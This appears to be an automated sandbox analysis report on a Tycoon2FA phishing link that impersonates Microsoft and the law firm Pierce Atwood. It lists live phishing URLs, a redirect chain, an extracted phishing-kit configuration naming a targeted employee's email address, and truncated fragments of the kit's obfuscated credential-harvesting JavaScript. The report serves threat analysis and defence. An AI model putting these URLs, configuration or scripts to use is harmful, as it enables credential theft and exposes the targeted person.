Windows Analysis Report
https://u17065553.ct.sendgrid.net/ls/click?upn=u001.Rw-2FXpvWBRDxNoiEvv-2B0VhMl349dE-2BIxYKCLpL5-2B-2FL8px39hmRTYxAZ-2BeMH1CR7jYvsg3f7mQR-2BtgzEdpv6rWDyoEa1Isq60WafIaat9IMqfozrbRuGiDhSD5zRfw1vSUnaPfHOkeKVWyjmgPghsIl-2FnSiz3vjd-2BgNdZNW1WWi7RlhTni8jQbV4O1UkQOa0-2F2VYGlXOPUclqMwRi50Vl1PR4j2jhVrjOnUdA6

Overview

General Information

Sample URL: https://u17065553.ct.sendgrid.net/ls/click?upn=u001.Rw-2FXpvWBRDxNoiEvv-2B0VhMl349dE-2BIxYKCLpL5-2B-2FL8px39hmRTYxAZ-2BeMH1CR7jYvsg3f7mQR-2BtgzEdpv6rWDyoEa1Isq60WafIaat9IMqfozrbRuGiDhSD5zRfw1vSUnaPfHO
Analysis ID: 1640820
Infos:

Detection

HTMLPhisher, Invisible JS, Tycoon2FA
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

AI detected phishing page
Antivirus detection for URL or domain
Found malware configuration
Yara detected AntiDebug via timestamp check
Yara detected HtmlPhish10
Yara detected Invisible JS
Yara detected Obfuscation Via HangulCharacter
Yara detected Tycoon 2FA PaaS
AI detected suspicious Javascript
Creates files inside the system directory
Deletes files inside the Windows folder
Detected non-DNS traffic on DNS port
Detected suspicious crossdomain redirect
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden javascript code
HTML title does not match URL
Invalid T&C link found
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: https://rft.naturdon.com/xyyV1ZiqNXRC8zWXcIUDTUea88bP6rhTuulsSZCyRMCDOqwZZUjy Avira URL Cloud: Label: phishing
Source: https://rft.naturdon.com/xyR81473VsYaArsvHmgh24 Avira URL Cloud: Label: phishing
Source: https://rft.naturdon.com/wxR15iAruHCp5MR53stdlsbAewGX1FsavzlKmlR34130 Avira URL Cloud: Label: phishing
Source: https://rft.naturdon.com/GDSherpa-bold.woff Avira URL Cloud: Label: phishing
Source: https://rft.naturdon.com/yp9BZPnLvX9qppjZ6vwVf7ZEopBEJOVpdL8dvd Avira URL Cloud: Label: phishing
Source: https://rft.naturdon.com/GDSherpa-bold.woff2 Avira URL Cloud: Label: phishing
Source: https://rft.naturdon.com/GDSherpa-regular.woff2 Avira URL Cloud: Label: phishing
Source: https://rft.naturdon.com/iVYo/ Avira URL Cloud: Label: phishing
Source: https://rft.naturdon.com/34ljcaLCdgnxyAWwV8920 Avira URL Cloud: Label: phishing
Source: https://rft.naturdon.com/rsj9FvgfYrm0DCkU7R3E0ZVRtwZjLNORj7eVq7ghG3bg6DT6IOZl4JRef193 Avira URL Cloud: Label: phishing
Source: https://rft.naturdon.com/dezNUCB7F1KEsi0FN0wryA8y4av4n6Oz1WzLtiMGksrOn987oMYSmcxxtWYou2jfcMbVvmkb60VdA3wr1dwZEXuZoYuejWksgw45j3q4VZxbXQF10CkWdNYZxh3MHx6WHC7lGtJJ6scfMTtvSsNFNJCw93uLSr83gx6zpijd2MxlyhgcWIfR6tYb2L6cd662 Avira URL Cloud: Label: phishing
Source: https://rft.naturdon.com/uvJtmTGXX2g3FEEqQIMgBrLoxZ456mS64jlG3A6l7y7Lxkm6YTIoOlgS7jv42MEgh260 Avira URL Cloud: Label: phishing
Source: https://rft.naturdon.com/klZUXgOlh2u3Z2ys2P7suUE8OPsvE6D0NZcY24FlEVoyLh1rlCu0zJMqOpqgPM0t8xKY93rEWKezYEZUkbXH3MBDHfCQeW7aWFIDvpz4vU3PIiYP2CoSTMqCoZvmlMmOzASNryz660 Avira URL Cloud: Label: phishing
Source: https://rft.naturdon.com/ijQ0IOXUR1aIdE2dIax8V9VT5mgSv8B3wxiSY8D4KNzfk5az6fKC4B8vvw56170 Avira URL Cloud: Label: phishing
Source: https://RFT.naturdon.com/iVYo/#D Avira URL Cloud: Label: phishing
Source: https://rft.naturdon.com/favicon.ico Avira URL Cloud: Label: phishing
Source: https://rft.naturdon.com/rvBXzyX4Qq50i8TvtNXs8BpqNqxHqx6mzSSKcXalR4B6PLT8k9y Avira URL Cloud: Label: phishing
Source: https://rft.naturdon.com/GDSherpa-regular.woff Avira URL Cloud: Label: phishing
Source: https://rft.naturdon.com/GDSherpa-vf2.woff2 Avira URL Cloud: Label: phishing
Source: https://rft.naturdon.com/efueBIf7KMBbXW0qQF2zeji3jy0JijcyRqJUUwcvNTCnOUKvkR78143 Avira URL Cloud: Label: phishing
Source: https://rft.naturdon.com/klVMx7KVI7aqSsO73T4YmMDJiwpgOXnjl0kvOhd3fZAopRdu3RNdl8MlVtw7oEWHHR2t8JGp85UDgXLK6yz230 Avira URL Cloud: Label: phishing
Source: https://rft.naturdon.com/optadu1ofPxrFCa4cOe9bGejoa2vR7hUGzGuvm86IppsV4y85FAZpZxeuef235 Avira URL Cloud: Label: phishing
Source: https://rft.naturdon.com/yzUMXXAK9cdiVG7unTSOjXlhW72wM8rZJ7uRvQrQmnp9mH4LntaZDifn490180 Avira URL Cloud: Label: phishing
Source: https://rft.naturdon.com/56ybTuSQ1jJ6y8kcSz0CgEs2AYKij17gyitf7LX4hemrK89103 Avira URL Cloud: Label: phishing
Source: https://rft.naturdon.com/GDSherpa-vf.woff2 Avira URL Cloud: Label: phishing
Source: https://rft.naturdon.com/qrhmLtoaKGMi81xl8TzghJ99XVgOdtJgIR4uW45140 Avira URL Cloud: Label: phishing
Source: https://rft.naturdon.com/ijrlV3hi6dkeYhbR0U6WhmmiYz2MGccNsZegAMCklGrcaCM65n1iEmiCkEsATX4zN3WzSG5I12210 Avira URL Cloud: Label: phishing
Found malware configuration
Source: 3.18.d.script.csv Malware Configuration Extractor: Tycoon2FA {"otherweburl": "", "websitenames": "[\"godaddy\", \"okta\"]", "bes": "[\"Apple.com\",\"Netflix.com\"]", "pes": "[\"https:\\/\\/t.me\\/\",\"https:\\/\\/t.com\\/\",\"t.me\\/\",\"https:\\/\\/t.me.com\\/\",\"t.me.com\\/\",\"t.me@\",\"https:\\/\\/t.me@\",\"https:\\/\\/t.me\",\"https:\\/\\/t.com\",\"t.me\",\"https:\\/\\/t.me.com\",\"t.me.com\",\"t.me\\/@\",\"https:\\/\\/t.me\\/@\",\"https:\\/\\/t.me@\\/\",\"t.me@\\/\",\"https:\\/\\/www.telegram.me\\/\",\"https:\\/\\/www.telegram.me\"]", "capnum": "1", "appnum": "1", "pvn": "0", "view": "", "pagelinkval": "eqTMS", "emailcheck": "dcabral@pierceatwood.com", "webname": "rtrim(/web8/, '/')", "urlo": "/rvBXzyX4Qq50i8TvtNXs8BpqNqxHqx6mzSSKcXalR4B6PLT8k9y"}

Phishing
barindex
AI detected phishing page
Source: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYC Joe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is a well-known global technology company., The URL 'rft.naturdon.com' does not match the legitimate domain 'microsoft.com'., The domain 'naturdon.com' is not associated with Microsoft and appears unrelated., The presence of a subdomain 'rft' does not align with typical Microsoft subdomains., The email domain 'pierceatwood.com' is unrelated to Microsoft, suggesting potential phishing., The URL structure and domain name do not reflect any known Microsoft services or products. DOM: 3.4.pages.csv
Source: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYC Joe Sandbox AI: Score: 9 Reasons: The brand 'Pierce Atwood' is a known law firm with a legitimate domain likely being 'pierceatwood.com'., The URL 'rft.naturdon.com' does not match the legitimate domain of Pierce Atwood., The domain 'naturdon.com' does not have any known association with Pierce Atwood., The presence of a password input field to access office mail is suspicious, especially on an unrelated domain., The URL structure with 'rft' as a subdomain and 'naturdon.com' as the main domain is unusual and not associated with the brand. DOM: 3.6.pages.csv
Yara detected HtmlPhish10
Source: Yara match File source: 3.5.pages.csv, type: HTML
Source: Yara match File source: 3.4.pages.csv, type: HTML
Source: Yara match File source: 3.6.pages.csv, type: HTML
Source: Yara match File source: 3.7.pages.csv, type: HTML
Yara detected Invisible JS
Source: Yara match File source: 2.3.d.script.csv, type: HTML
Source: Yara match File source: 2.2.pages.csv, type: HTML
Source: Yara match File source: 2.1.pages.csv, type: HTML
Yara detected Obfuscation Via HangulCharacter
Source: Yara match File source: 2.3.d.script.csv, type: HTML
Source: Yara match File source: 3.21..script.csv, type: HTML
Source: Yara match File source: 2.2.pages.csv, type: HTML
Source: Yara match File source: 2.1.pages.csv, type: HTML
Source: Yara match File source: dropped/chromecache_123, type: DROPPED
Yara detected Tycoon 2FA PaaS
Source: Yara match File source: 3.18.d.script.csv, type: HTML
Source: Yara match File source: 2.4.d.script.csv, type: HTML
Source: Yara match File source: 2.11.d.script.csv, type: HTML
Source: Yara match File source: 3.13..script.csv, type: HTML
Source: Yara match File source: 3.14..script.csv, type: HTML
Source: Yara match File source: 2.8..script.csv, type: HTML
Source: Yara match File source: 2.1.pages.csv, type: HTML
Source: Yara match File source: 2.2.pages.csv, type: HTML
Source: Yara match File source: 3.4.pages.csv, type: HTML
Source: Yara match File source: 3.5.pages.csv, type: HTML
Source: Yara match File source: 3.6.pages.csv, type: HTML
Source: Yara match File source: 3.7.pages.csv, type: HTML
AI detected suspicious Javascript
Source: 2.4.d.script.csv Joe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script demonstrates several high-risk behaviors, including detecting the presence of web automation tools, blocking keyboard shortcuts and right-click functionality, and redirecting the user to an external website (eBay) after a delay. These behaviors are highly suspicious and indicate potential malicious intent, such as preventing the user from interacting with the page or redirecting them to a phishing site.
Source: 2.11.d.script.csv Joe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script demonstrates several high-risk behaviors, including detecting the presence of web automation tools, disabling common keyboard shortcuts and right-click functionality, and implementing a mechanism to detect and redirect the user to an external website (Google.com) upon detecting a debugger being attached. These behaviors are highly suspicious and indicative of malicious intent, likely attempting to evade detection and analysis.
Source: 2.10..script.csv Joe Sandbox AI: Detected suspicious JavaScript with source url: https://rft.naturdon.com/iVYo/... This script demonstrates several high-risk behaviors, including dynamic code execution, potential data exfiltration, and suspicious redirection. The use of obfuscated code, the presence of anti-debugging techniques, and the overall malicious intent make this a high-risk script.
Source: 2.3.d.script.csv Joe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script demonstrates high-risk behaviors, including dynamic code execution through the use of `eval()` and potential data exfiltration. The obfuscated code and use of proxy objects further increase the risk. Overall, this script exhibits a high level of malicious intent and should be treated with caution.
Source: 2.2..script.csv Joe Sandbox AI: Detected suspicious JavaScript with source url: https://rft.naturdon.com/iVYo/... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The use of `atob` and `decodeURIComponent` to decode and execute remote code is a clear indicator of malicious intent. Additionally, the script appears to be sending user data to an untrusted domain, which poses a significant risk of data theft or other malicious activities. Overall, this script exhibits a high level of suspicion and should be treated as a potential security threat.
HTML body contains low number of good links
Source: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYC HTTP Parser: Number of links: 0
HTML body contains password input but no form action
Source: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYC HTTP Parser: <input type="password" .../> found but no <form action="...
HTML page contains hidden javascript code
Source: https://rft.naturdon.com/iVYo/#Ddcabral@pierceatwood.com HTTP Parser: Base64 decoded: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>AI UI Template</title> <style> body { font-family: 'Segoe UI', Tahoma, Geneva,...
HTML title does not match URL
Source: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYC HTTP Parser: Title: Authenticate For Security does not match URL
Invalid T&C link found
Source: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYC HTTP Parser: Invalid link: Terms of use
Source: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYC HTTP Parser: Invalid link: Privacy & cookies
Source: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYC HTTP Parser: Invalid link: Terms of use
Source: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYC HTTP Parser: Invalid link: Privacy & cookies
Source: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYC HTTP Parser: Invalid link: Terms of use
Source: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYC HTTP Parser: Invalid link: Privacy & cookies
Source: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYC HTTP Parser: Invalid link: Terms of use
Source: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYC HTTP Parser: Invalid link: Privacy & cookies
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)
Source: https://rft.naturdon.com/iVYo/ HTTP Parser: function kcadliwhay(){uebpspmcnq = atob("pcfet0nuwvbfigh0bww+cjxodg1sigxhbmc9imvuij4kpghlywq+ciagica8bwv0ysbjagfyc2v0psjvveytoci+ciagica8bwv0ysbuyw1lpsj2awv3cg9ydcigy29udgvudd0id2lkdgg9zgv2awnllxdpzhrolcbpbml0awfslxnjywxlpteumci+ciagica8dgl0bgu+r3jhcghpyybdyxjkifdlyibuzw1wbgf0ztwvdgl0bgu+ciagica8c3r5bgu+ciagicagicagym9kesb7ciagicagicagicagigzvbnqtzmftawx5oiantw9udhnlcnjhdccsihnhbnmtc2vyawy7ciagicagicagicagigjhy2tncm91bmqty29sb3i6icmxytfhmmu7ciagicagicagicagignvbg9yoiajztblmguwowogicagicagicagicbtyxjnaw46ida7ciagicagicagicagihbhzgrpbmc6ida7ciagicagicagicagigxpbmutagvpz2h0oiaxljy7ciagicagicagfqogicagicagighlywrlcib7ciagicagicagicagigjhy2tncm91bmqty29sb3i6icmxnjixm2u7ciagicagicagicagihbhzgrpbmc6idmwchg7ciagicagicagicagihrlehqtywxpz246ignlbnrlcjskicagicagicagicagym9yzgvylwjvdhrvbtogm3b4ihnvbglkicnlotq1nja7ciagicagicagfqogicagicagighlywrlcibomsb7ciagicagicagicagig1hcmdpbjogmdskicagicagicagicagzm9udc1zaxploia0mnb4owogicagicagicagicbjb2xvcjogi2u5ndu2mdskicagicagicagicagdgv4dc10cmfuc2zvcm06ihvwcgvyy2fzztskicagicagi...
Source: anonymous function HTTP Parser: var otherweburl = "";var websitenames = ["godaddy", "okta"];var bes = ["apple.com","netflix.com"];var pes = ["https:\/\/t.me\/","https:\/\/t.com\/","t.me\/","https:\/\/t.me.com\/","t.me.com\/","t.me@","https:\/\/t.me@","https:\/\/t.me","https:\/\/t.com","t.me","https:\/\/t.me.com","t.me.com","t.me\/@","https:\/\/t.me\/@","https:\/\/t.me@\/","t.me@\/","https:\/\/www.telegram.me\/","https:\/\/www.telegram.me"];var capnum = 1;var appnum = 1;var pvn = 0;var view = "";var pagelinkval = "eqtms";var emailcheck = "dcabral@pierceatwood.com";var webname = "rtrim(/web8/, '/')";var urlo = "/rvbxzyx4qq50i8tvtnxs8bpqnqxhqx6mzsskcxalr4b6plt8k9y";var gdf = "/ghqz0xkg5s1z1tyocpd0q3ygfsdyyzyndyfpxu4wavlbbq0ab117";var odf = "/gh03dkidmn49qvryzakk8jngnrxcd645";var twa = 0;var currentreq = null;var requestsent = false;var pagedata = "";var redirecturl = "";var useragent = navigator.useragent;var browsername;var userip;var usercountry;var errorcodeexecuted = false;if(useragent.matc...
Source: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYC HTTP Parser: <input type="password" .../> found
Source: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYC HTTP Parser: No favicon
Source: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYC HTTP Parser: No favicon
Source: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYC HTTP Parser: No favicon
Source: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYC HTTP Parser: No favicon
Source: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYC HTTP Parser: No <meta name="author".. found
Source: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYC HTTP Parser: No <meta name="author".. found
Source: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYC HTTP Parser: No <meta name="author".. found
Source: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYC HTTP Parser: No <meta name="author".. found
Source: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYC HTTP Parser: No <meta name="copyright".. found
Source: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYC HTTP Parser: No <meta name="copyright".. found
Source: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYC HTTP Parser: No <meta name="copyright".. found
Source: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYC HTTP Parser: No <meta name="copyright".. found
Source: unknown HTTPS traffic detected: 142.250.184.228:443 -> 192.168.2.4:49720 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.89.123.122:443 -> 192.168.2.4:49722 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.89.123.122:443 -> 192.168.2.4:49721 version: TLS 1.2
Source: unknown HTTPS traffic detected: 44.226.80.26:443 -> 192.168.2.4:49723 version: TLS 1.2
Source: unknown HTTPS traffic detected: 186.209.113.142:443 -> 192.168.2.4:49725 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.20.250:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.20.250:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.2.137:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.17.25.14:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.16.2.189:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.16.5.189:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:63370 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:63372 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.195.46:443 -> 192.168.2.4:63378 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.4:63379 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.20.250:443 -> 192.168.2.4:63386 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:63390 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.33.187.96:443 -> 192.168.2.4:63391 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.33.187.96:443 -> 192.168.2.4:63392 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:63396 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.33.187.14:443 -> 192.168.2.4:63421 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.70.233:443 -> 192.168.2.4:63426 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:63427 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.0.100:443 -> 192.168.2.4:63428 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:63431 version: TLS 1.2
Source: unknown HTTPS traffic detected: 92.123.12.181:443 -> 192.168.2.4:63430 version: TLS 1.2
Source: unknown HTTPS traffic detected: 92.123.12.181:443 -> 192.168.2.4:63429 version: TLS 1.2
Source: unknown HTTPS traffic detected: 2.19.96.123:443 -> 192.168.2.4:63432 version: TLS 1.2
Detected non-DNS traffic on DNS port
Source: global traffic TCP traffic: 192.168.2.4:63369 -> 1.1.1.1:53
Detected suspicious crossdomain redirect
Source: C:\Program Files\Google\Chrome\Application\chrome.exe HTTP traffic: Redirect from: u17065553.ct.sendgrid.net to https://app.salesforceiq.com/r?target=603feeba78af1c08f5743ad0&t=afwhzf0ambvhyfm9rctktaa9k2lfirndsus7iryke1td_g46ivu2nabpy5st0sm4yvyv9nje6hj_akhagab2q-vekjszzwprhws5qxj8pkn-xa_5zkvzhw1vuxoximx7iypi_hkyjtnb&url=https://registrosaraquari.com.br/g63f/614583/pierceatwood/?nl=zgnhynjhbebwawvyy2vhdhdvb2quy29t
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown TCP traffic detected without corresponding DNS query: 142.250.186.99
Source: unknown TCP traffic detected without corresponding DNS query: 142.250.186.99
Source: unknown TCP traffic detected without corresponding DNS query: 142.250.186.99
Source: unknown TCP traffic detected without corresponding DNS query: 142.250.186.99
Source: unknown TCP traffic detected without corresponding DNS query: 142.250.186.99
Source: unknown TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown TCP traffic detected without corresponding DNS query: 142.250.186.99
Source: unknown TCP traffic detected without corresponding DNS query: 142.250.186.99
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /ls/click?upn=u001.Rw-2FXpvWBRDxNoiEvv-2B0VhMl349dE-2BIxYKCLpL5-2B-2FL8px39hmRTYxAZ-2BeMH1CR7jYvsg3f7mQR-2BtgzEdpv6rWDyoEa1Isq60WafIaat9IMqfozrbRuGiDhSD5zRfw1vSUnaPfHOkeKVWyjmgPghsIl-2FnSiz3vjd-2BgNdZNW1WWi7RlhTni8jQbV4O1UkQOa0-2F2VYGlXOPUclqMwRi50Vl1PR4j2jhVrjOnUdA6E03jJF3YxTMCgxElFH-2Bjnu2oS6ZdGJGXf9TKr37Eh3pnVym0G5ilxnSN6bJyz-2FWbi47cL6vQDH-2FLX6HDdsxLQr4OiWNyplfwZIjGldJH3Oj3k-2B0Sr92pyHOs07I3QG9CN9BFC52s0blv8XoiBzACqb7MDZTgdhgx-2Fj3fdHjRUqn0E0aUxawEH-2F-2B7SQiAWk4bi4jHEXI-3DlKA5_AMa9RrBWZfrIG11ZEW0ArF1BRI9e8rcrPZr5T9DlZ7Ba2ZAvuJPwiS8cX4aFrXjFerUDwGcfFdNk6Ly7G30W-2FpJZ3vwwQM6aCBocvejnros7-2FYckwVQH02a6C13hCOZXCH6DxRozn9HOBenC-2BdqPCIwBV1vvkSKYyJjB4wo2MVyi5b4Ko6F9xhTiwowhGgTSo1JEnvhUu4BAFpCuBdmsFw-3D-3D HTTP/1.1Host: u17065553.ct.sendgrid.netConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, 